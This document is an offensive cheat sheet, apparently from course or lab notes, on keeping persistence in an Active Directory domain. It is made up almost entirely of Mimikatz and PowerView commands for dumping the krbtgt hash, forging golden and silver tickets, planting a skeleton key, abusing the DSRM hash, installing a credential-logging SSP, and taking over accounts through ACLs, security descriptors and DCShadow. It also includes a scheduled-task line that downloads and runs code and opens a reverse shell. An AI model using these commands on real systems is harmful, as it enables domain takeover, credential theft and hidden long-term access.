Golden Ticket

# Run as DA locally on DC to get krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' 

# Run Remotely as DA to get krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

# Get Domain-SID:

# Get Domain Ticket policy:

# Create ticket:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

# Use ticket:
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

# Access

ls \\domain-dc\c$

Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\Administrator /domain:DOMAIN"'

Silver Ticket

# Using DC$ hash to provide access to domain shares on DC:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN /sid:S-1-5-211874506631-3219952063-538504511 /target:DC.DOMAIN.local /service:CIFS /rc4:HASH /user:Administrator /ptt"'

# Create ticket for HOST (using DC$ hash) to allow us to schedule tasks on target:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:HOST /rc4:HASH /user:Administrator /ptt"'

## Schedule task with above silver ticket
schtasks /create /S dc.DOMAIN.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "User" /TR "powershell iex (iwr -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress -Port 443"
schtasks /Run /S dc.DOMAIN.local /TN "User"

# To execute wmi need HOST and RPCSS
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:RPCSS /rc4:HASH /user:Administrator /ptt"'

Skeleton Key

# Creating skeleton key
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.DOMAIN.local

# Using Skeleton Key (Password is "mimikatz")
Enter-PSSession –Computername dc –credential DOMAIN\Administrator

DSRM (Directory Services Restore Mode)

DSRM password is needed when setting up a DC and is the local administrator password. By making some reg changes, it is possible to use the DSRM hash in a PTH attack. Gives DA that is very unlikely to change.

# Dump DSRM passwords (requires DA):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc

# Change Reg:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Pass the DSRM hash:
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc /user:Administrator /ntlm:HASH  /run:powershell.exe"'

Custom SSP

A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Some SSP Packages by Microsoft are NTLM, Kerberos, Wdigest, CredSSP. Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.

Drop the mimilib.dll to system32 and add mimilib to  HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages: 
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages' 
$packages += "mimilib" 
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages 
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

# Using mimikatz, inject into lsass (Not stable with Server 2016):
Invoke-Mimikatz -Command '"misc::memssp"'

# All log ons are now logged in clear too:

ACL Abuse - AdminSDHolder

Resides in the System container of a domain and used to control the permissions - using an ACL - for certain built-in privileged groups ( called Protected Groups). Propogates across AD every hour.

# Giving a user full rights over AdminSDHolder groups: 
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose

# Giving user reset password rights:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose

# Giving user WriteMember privs:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose

# Check Domain Admins permission as normal user:
Get-ObjectAcl -SamAccountName "Domain Admins" ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}

# Abuse FullControl (powerview_dev):
Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose

# Abusing ResetPassword (powerview_dev):
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText Force) -Verbose

# Add DCSYNC rights to a user:
Add-ObjectAcl -TargetDistinguishedName 'DC=DOMAIN,DC=local' -PrincipalSamAccountName student1 -Rights DCSync -Verbose
# Run SDProp manually using Invoke-SDPropagator.ps1: 
Invoke-SDPropagator -timeoutMinutes 1 -showProgress Verbose

# For pre-Server 2008 machines: 
Invoke-SDPropagator -taskname FixUpInheritance timeoutMinutes 1 -showProgress -Verbose

ACL Abuse - Security Descriptors

It is possible to modify Security Descriptors (security information like Owner, primary group, DACL and SACL) of multiple remote access methods (securable objects) to allow access to non-admin users. This is rarely checked.

# On local machine for student1: 
Set-RemoteWMI -UserName student1 -Verbose

# On remote machine for student1 without explicit credentials: 
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose

# On remote machine with explicit credentials. Only root\cimv2 and nested namespaces: 
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Credential Administrator –namespace 'root\cimv2' -Verbose

# On remote machine remove permissions: 
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose

DCShadow - Forest Persistance

Machine needs to be part of the parent domain. Can be changed in the system properties with admin access. Requires user to be a valid user for that domain too, so may need to add them first. Will require comp restart.

Requires 2 consoles. One as DA, one as SYSTEM. SYSTEM sets up the fake DC, DA pushes the replication.

# Setting up Fake DC
mimikatz# !+
mimikatz# !processtoken
mimikatz# lsadump::dcshadow /object:targetuser /attribute:serviceprincipalname /value:uniquespn/DC1

# On DA terminal
mimikatz -command '"lsadump::dcshadow /push"'

Allowing DCShadow to a user so they can do it without DA privs for persistance. Once done the user can run the /push terminal without DA. First terminal still needs SYSTEM privs.

Set-DCShadowPermissions -FakeDC USER -SAMAccountName USER -Username studentx -Verbose

Last updated